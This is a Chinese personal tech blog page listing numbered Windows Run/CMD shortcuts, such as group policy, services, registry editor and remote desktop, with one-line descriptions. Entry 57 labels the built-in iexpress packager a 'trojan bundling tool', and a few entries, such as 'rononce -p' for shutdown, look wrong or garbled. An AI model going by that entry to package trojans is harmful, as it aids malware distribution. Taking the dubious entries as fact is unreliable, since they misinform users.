<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>MD 格式 | 新诸子</title>
  <meta name="keywords" content=" tool ">
  <meta name="description" content="MD 格式 | 新诸子">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="页面未找到！">
<meta property="og:type" content="website">
<meta property="og:title" content="404">
<meta property="og:url" content="http://yoursite.com/404.html">
<meta property="og:site_name" content="新诸子">
<meta property="og:description" content="页面未找到！">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2016-09-27T03:31:01.000Z">
<meta property="article:modified_time" content="2020-05-12T02:42:41.559Z">
<meta property="article:author" content="诸子百家-谁的天下?">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.0.1" rel="stylesheet">

<link href="/css/hl_theme/darcula.css?v=1.0.1" rel="stylesheet">

<link href="//cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.2/animate.min.css" rel="stylesheet">
<link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/js/fontawesome.min.js" rel="stylesheet">

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1" ></script>

<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.0.2/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.js"></script>



<script src="//cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.0.1" ></script>

<meta name="generator" content="Hexo 4.2.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="true">
  <input class="theme_blog_path" value="">
</div>

<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>诸子百家-谁的天下?</span>
</div>

<div class="icon">
    
        
        <a title="rss" href="/atom.xml" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-rss"></use>
                </svg>
            
        </a>
        
    
        
        <a title="github" href="https://github.com/xinzhuzi" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-github"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
        <a title="jianshu" href="https://www.jianshu.com/u/e7aab68810b1" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-jianshu"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
        <a title="email" href="mailto:1487842110@qq.com" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-email"></use>
                </svg>
            
        </a>
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=1487842110&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
        <a title="kugou" href="https://www.kugou.com/" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-kugou"></use>
                </svg>
            
        </a>
        
    
        
        <a title="neteasemusic" href="https://music.163.com/#/user/home?id=88151013" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-neteasemusic"></use>
                </svg>
            
        </a>
        
    
</div>




<ul>
    <li><div class="all active">全部文章<small>(59)</small></div></li>
    
        
            
            <li><div data-rel="博客">博客<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="诗词随笔">诗词随笔<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="杂项">杂项<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Net">Net<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="工具">工具<small>(6)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="正则表达式">正则表达式<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="指针">指针<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Renderer">Renderer<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="算法">算法<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Unity">Unity<small>(24)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Unity优化">Unity优化<small>(14)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="UGUI">UGUI<small>(1)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a class="about  hasFriend  " target="_blank" href="/about">关于</a><a style="width: 50%"  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="59">
<input type="hidden" id="yelog_site_word_count" value="125.5k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://github.com/xinzhuzi">诸子百家-谁的天下?</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode === 13){return false;}">
        <input id="local-search-input" class="search" type="text" placeholder="Search..." />
        <i class="cross"></i>
        <span>
            <label for="tagswitch">Tags:</label>
            <input id="tagswitch" type="checkbox" style="display: none" />
            <i id="tagsWitchIcon"></i>
        </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a class="color5">hexo</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">诗词随笔</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color3">杂项</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color2">Net English Word</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color2">CSharp</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color4">Net</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color3">Protobuf,lua</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color3">re</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color3">指针</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color4">Renderer</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">tool</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color3">算法</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color1">Unity</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color4">BestHttp</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color1">IndustrialAutomation</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color3">Unity优化</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color2">UnityEditor</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">UGUI</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color2">VSCode</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    
    <nav id="title-list-nav">
        
        <a  class="博客 "
           href="/2020/05/08/Hexo%20%E7%9A%84%E7%AE%80%E5%8D%95%E6%93%8D%E4%BD%9C/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="Hexo 的简单操作">Hexo 的简单操作</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="博客 "
           href="/2020/05/08/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E4%BB%A5%E5%8F%8A%E7%BC%96%E5%86%99/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="博客搭建以及编写">博客搭建以及编写</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="诗词随笔 "
           href="/2020/05/10/%E8%AF%97%E8%AF%8D%E9%9A%8F%E7%AC%94/"
           data-tag="诗词随笔"
           data-author="" >
            <span class="post-title" title="诗词随笔">诗词随笔</span>
            <span class="post-date" title="2020-05-10 11:41:32">2020/05/10</span>
        </a>
        
        <a  class="杂项 "
           href="/2020/05/08/%E5%85%B1%E4%BA%A7%E5%85%9A%E5%AE%A3%E8%A8%80/"
           data-tag="杂项"
           data-author="" >
            <span class="post-title" title="共产党宣言">共产党宣言</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="Net "
           href="/2020/08/14/EnglistWord/Network/"
           data-tag="Net English Word"
           data-author="" >
            <span class="post-title" title="程序员需要掌握的英文单词">程序员需要掌握的英文单词</span>
            <span class="post-date" title="2020-08-14 11:41:32">2020/08/14</span>
        </a>
        
        <a  class="Net "
           href="/2020/05/08/Net/CSharp/"
           data-tag="CSharp"
           data-author="" >
            <span class="post-title" title="网络部分">网络部分</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="Net "
           href="/2020/05/08/Net/net/"
           data-tag="Net"
           data-author="" >
            <span class="post-title" title="网络部分">网络部分</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="工具 "
           href="/2020/05/08/Potobuf-Lua/ProtobufLua/"
           data-tag="Protobuf,lua"
           data-author="" >
            <span class="post-title" title="Protobuf-Lua-Python">Protobuf-Lua-Python</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="正则表达式 "
           href="/2020/05/08/RegularExpression/RegularExpression/"
           data-tag="re"
           data-author="" >
            <span class="post-title" title="正则表达式">正则表达式</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="指针 "
           href="/2020/05/08/Pointer/%E6%8C%87%E9%92%88/"
           data-tag="指针"
           data-author="" >
            <span class="post-title" title="C/C++指针详解">C/C++指针详解</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="Renderer "
           href="/2020/05/08/Renderer/%E6%B8%B2%E6%9F%93%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B/"
           data-tag="Renderer"
           data-author="" >
            <span class="post-title" title="渲染基本流程">渲染基本流程</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="工具 "
           href="/2020/05/08/Tools/Windows%E5%91%BD%E4%BB%A4/"
           data-tag="tool"
           data-author="" >
            <span class="post-title" title="MD 格式">MD 格式</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="工具 "
           href="/2020/05/08/Tools/md%E6%A0%BC%E5%BC%8F/"
           data-tag="tool"
           data-author="" >
            <span class="post-title" title="MD 格式">MD 格式</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="工具 "
           href="/2020/05/08/Tools/%E5%A5%BD%E7%94%A8%E7%9A%84%E6%8F%92%E4%BB%B6%E8%BD%AF%E4%BB%B6/"
           data-tag="tool"
           data-author="" >
            <span class="post-title" title="好用的插件软件">好用的插件软件</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="工具 "
           href="/2020/05/08/Tools/%E7%A0%B4%E8%A7%A3Teamviewer/"
           data-tag="tool"
           data-author="" >
            <span class="post-title" title="破解 TeamViewer">破解 TeamViewer</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="工具 "
           href="/2020/05/08/Tools/%E7%A7%91%E5%AD%A6%E4%B8%8A%E7%BD%91/"
           data-tag="tool"
           data-author="" >
            <span class="post-title" title="科学上网">科学上网</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="算法 "
           href="/2020/05/08/algorithm/%E6%A1%88%E4%BE%8B/"
           data-tag="算法"
           data-author="" >
            <span class="post-title" title="C基础案例">C基础案例</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="算法 "
           href="/2020/05/08/algorithm/algorithm/"
           data-tag="算法"
           data-author="" >
            <span class="post-title" title="学习算法大纲">学习算法大纲</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="Unity "
           href="/2020/05/08/Unity/AssetBundles/AssetBundle/"
           data-tag="Unity"
           data-author="" >
            <span class="post-title" title="AssetBundle 介绍">AssetBundle 介绍</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="Unity "
           href="/2020/05/11/Unity/BestHttp/BestHttp%E4%BB%8B%E7%BB%8D/"
           data-tag="BestHttp"
           data-author="" >
            <span class="post-title" title="BestHttp介绍1">BestHttp介绍1</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/FrameSynchronization/FrameSync/"
           data-tag="Unity"
           data-author="" >
            <span class="post-title" title="帧同步">帧同步</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a  class="Unity "
           href="/2020/05/11/Unity/BestHttp/WebSocket/"
           data-tag="BestHttp"
           data-author="" >
            <span class="post-title" title="BestHttp介绍2">BestHttp介绍2</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a  class="Unity "
           href="/2020/05/08/Unity/AssetBundles/%E6%89%93%E5%8C%85%E7%AD%96%E7%95%A5/"
           data-tag="Unity"
           data-author="" >
            <span class="post-title" title="AssetBundle 打包策略">AssetBundle 打包策略</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="Unity "
           href="/2020/06/20/Unity/IndustrialAutomation/Unity%E5%90%8E%E5%B7%A5%E4%B8%9A%E5%8C%96%E6%B5%81%E7%A8%8B1/"
           data-tag="IndustrialAutomation"
           data-author="" >
            <span class="post-title" title="Unity后工业化流程2">Unity后工业化流程2</span>
            <span class="post-date" title="2020-06-20 11:41:32">2020/06/20</span>
        </a>
        
        <a  class=""
           href="/2020/05/12/Unity/OcclusionCulling/Occlusion%20Culling/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Unity/OcclusionCulling/Occlusion Culling">Unity/OcclusionCulling/Occlusion Culling</span>
            <span class="post-date" title="2020-05-12 10:42:41">2020/05/12</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/AndroidStudio/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity AndroidStudio工具检测优化">Unity AndroidStudio工具检测优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/CPU%E4%BC%98%E5%8C%96/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity CPU优化">Unity CPU优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="Unity "
           href="/2020/06/20/Unity/IndustrialAutomation/Unity%E5%90%8E%E5%B7%A5%E4%B8%9A%E5%8C%96%E6%B5%81%E7%A8%8B2/"
           data-tag="IndustrialAutomation"
           data-author="" >
            <span class="post-title" title="Unity后工业化流程">Unity后工业化流程</span>
            <span class="post-date" title="2020-06-20 11:41:32">2020/06/20</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/GPU%E4%BC%98%E5%8C%96/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity GPU优化">Unity GPU优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/Unity%E4%BC%98%E5%8C%96%E6%80%BB%E7%BA%B2/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity 优化总纲">Unity 优化总纲</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/Unity_UI%E4%BC%98%E5%8C%96/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity NGUI/UGUI优化">Unity NGUI/UGUI优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/Unity%E5%B7%A5%E5%85%B7UPR/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity工具使用">Unity工具使用</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/Unity%E5%B7%A5%E5%85%B7/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity工具使用">Unity工具使用</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class=""
           href="/2020/06/15/Unity/Optimize/XCode/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Unity/Optimize/XCode">Unity/Optimize/XCode</span>
            <span class="post-date" title="2020-06-15 15:02:03">2020/06/15</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/Unity%E5%86%85%E5%AD%98%E4%BC%98%E5%8C%96/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity 内存优化">Unity 内存优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/Unity%E5%B8%A7%E7%8E%87/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity 优化总纲">Unity 优化总纲</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a  class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/Unity%E6%B8%B2%E6%9F%93%E4%BC%98%E5%8C%96/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity 渲染优化">Unity 渲染优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/%E7%BD%91%E7%BB%9C%E4%BC%98%E5%8C%96/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity 网络优化">Unity 网络优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/Unity%E8%B5%84%E6%BA%90%E4%BC%98%E5%8C%96/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity 资源优化">Unity 资源优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/%E4%BB%A3%E7%A0%81%E7%BC%96%E5%86%99%E8%A7%84%E8%8C%83/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity 代码编写规范">Unity 代码编写规范</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/Path/%E5%B9%B3%E5%8F%B0%E8%B7%AF%E5%BE%84/"
           data-tag="Unity"
           data-author="" >
            <span class="post-title" title="各个平台的路径">各个平台的路径</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/1%20%E4%BB%8B%E7%BB%8DUnityEditor/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="1 介绍UnityEditor">1 介绍UnityEditor</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="UGUI "
           href="/2020/05/11/Unity/UGUI/%E4%BB%8B%E7%BB%8D/"
           data-tag="UGUI"
           data-author="" >
            <span class="post-title" title="1 Canvas">1 Canvas</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/10%20Screenshot/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="10 Screenshot">10 Screenshot</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity优化 "
           href="/2020/05/08/Unity/Optimize/%E8%BD%AF%E4%BB%B6UWA%E4%BC%98%E5%8C%96/"
           data-tag="Unity优化"
           data-author="" >
            <span class="post-title" title="Unity UWA工具检测优化">Unity UWA工具检测优化</span>
            <span class="post-date" title="2020-05-08 11:41:32">2020/05/08</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/11%20Handles/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="11 Handles">11 Handles</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/12%20Gizmos/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="12 Gizmos">12 Gizmos</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/13%20%E7%AE%80%E5%8D%95Node/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="13 简单Node">13 简单Node</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/2%20UnityEditor%E5%B8%B8%E7%94%A8%E5%B1%9E%E6%80%A7/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="2 UnityEditor常用属性">2 UnityEditor常用属性</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/3%20%E6%95%B0%E6%8D%AE%E4%BA%A4%E4%BA%92/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="3 数据交互">3 数据交互</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/5%20EditorWindow/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="5 EditorWindow">5 EditorWindow</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/6%20MenuItem/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="6 MenuItem">6 MenuItem</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/4%20EditorGUI/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="4 EditorGUI">4 EditorGUI</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/7%20CustomEditor_PropertyDrawer/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="7 CustomEditor_PropertyDrawer">7 CustomEditor_PropertyDrawer</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/8%20EditorGUILayout/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="8 EditorGUILayout">8 EditorGUILayout</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/9%20EditorWindow%E6%A1%88%E4%BE%8B1/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="9 EditorWindow案例1">9 EditorWindow案例1</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/Utils/%E5%B0%8F%E6%8A%80%E5%B7%A7/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="图片与字符串互转">图片与字符串互转</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/VisualStudioCode/VSCodeUnity/"
           data-tag="VSCode"
           data-author="" >
            <span class="post-title" title="在 Unity 下使用 VSCode 配置">在 Unity 下使用 VSCode 配置</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
        <a id="top" class="Unity "
           href="/2020/05/11/Unity/UnityEditor/FlatNode/FlatNode/"
           data-tag="UnityEditor"
           data-author="" >
            <span class="post-title" title="14 FlatNode">14 FlatNode</span>
            <span class="post-date" title="2020-05-11 11:41:32">2020/05/11</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-Tools/Windows命令" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">MD 格式</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
                <a  data-rel="工具">工具</a>
            
        </span>
        
        
        <span class="tag">
            
            <a class="color5">tool</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='更新时间: 2020-07-06 09:48:06'>2020-05-08 11:41</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:10.3k</span>
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="跳转至评论区">
            <a href="#comments">
                评论:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>运行操作</p>
<p>CMD命令：开始－&gt;运行－&gt;键入cmd或command(在命令行里可以看到系统版本、文件系统版本)</p>
<p>CMD命令锦集</p>
<ol>
<li>gpedit.msc—–组策略</li>
</ol>
<p>　　2. sndrec32——-录音机</p>
<p>　　3. Nslookup——-IP地址侦测器 ，是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。</p>
<p>　　4. explorer——-打开资源管理器</p>
<p>　　5. logoff———注销命令</p>
<p>　　6. shutdown——-60秒倒计时关机命令</p>
<p>　　7. lusrmgr.msc—-本机用户和组</p>
<p>　　8. services.msc—本地服务设置</p>
<p>　　9. oobe/msoobe /a—-检查XP是否激活</p>
<p>　　10. notepad——–打开记事本</p>
<p>　　11. cleanmgr——-垃圾整理</p>
<p>　　12. net start messenger—-开始信使服务</p>
<p>　　13. compmgmt.msc—计算机管理</p>
<p>　　14. net stop messenger—–停止信使服务</p>
<p>　　15. conf———–启动netmeeting</p>
<p>　　16. dvdplay——–DVD播放器</p>
<p>　　17. charmap——–启动字符映射表</p>
<p>　　18. diskmgmt.msc—磁盘管理实用程序</p>
<p>　　19. calc———–启动计算器</p>
<p>　　20. dfrg.msc——-磁盘碎片整理程序</p>
<p>　　21. chkdsk.exe—–Chkdsk磁盘检查</p>
<p>　　22. devmgmt.msc— 设备管理器</p>
<p>　　23. regsvr32 /u *.dll—-停止dll文件运行</p>
<p>　　24. drwtsn32—— 系统医生</p>
<p>　　25. rononce -p—-15秒关机</p>
<p>　　26. dxdiag———检查DirectX信息</p>
<p>　　27. regedt32——-注册表编辑器</p>
<p>　　28. Msconfig.exe—系统配置实用程序</p>
<p>　　29. rsop.msc——-组策略结果集</p>
<p>　　30. mem.exe——–显示内存使用情况</p>
<p>　　31. regedit.exe—-注册表</p>
<p>　　32. winchat——–XP自带局域网聊天</p>
<p>　　33. progman——–程序管理器</p>
<p>　　34. winmsd———系统信息</p>
<p>　　35. perfmon.msc—-计算机性能监测程序</p>
<p>　　36. winver———检查Windows版本</p>
<p>　　37. sfc /scannow—–扫描错误并复原</p>
<p>　　38. taskmgr—–任务管理器（2000/xp/2003</p>
<p>　　40. wmimgmt.msc—-打开windows管理体系结构(WMI)</p>
<p>　　41. wupdmgr——–windows更新程序</p>
<p>　　42. wscript——–windows脚本宿主设置</p>
<p>　　43. write———-写字板</p>
<p>　　45. wiaacmgr——-扫描仪和照相机向导</p>
<p>　　46. winchat——–XP自带局域网聊天</p>
<p>　　49. mplayer2——-简易widnows media player</p>
<p>　　50. mspaint——–画图板</p>
<p>　　51. mstsc———-远程桌面连接</p>
<p>　　53. magnify——–放大镜实用程序</p>
<p>　　54. mmc————打开控制台</p>
<p>　　55. mobsync——–同步命令</p>
<p>　　57. iexpress——-木马捆绑工具，系统自带</p>
<p>　　58. fsmgmt.msc—–共享文件夹管理器</p>
<p>　　59. utilman——–辅助工具管理器</p>
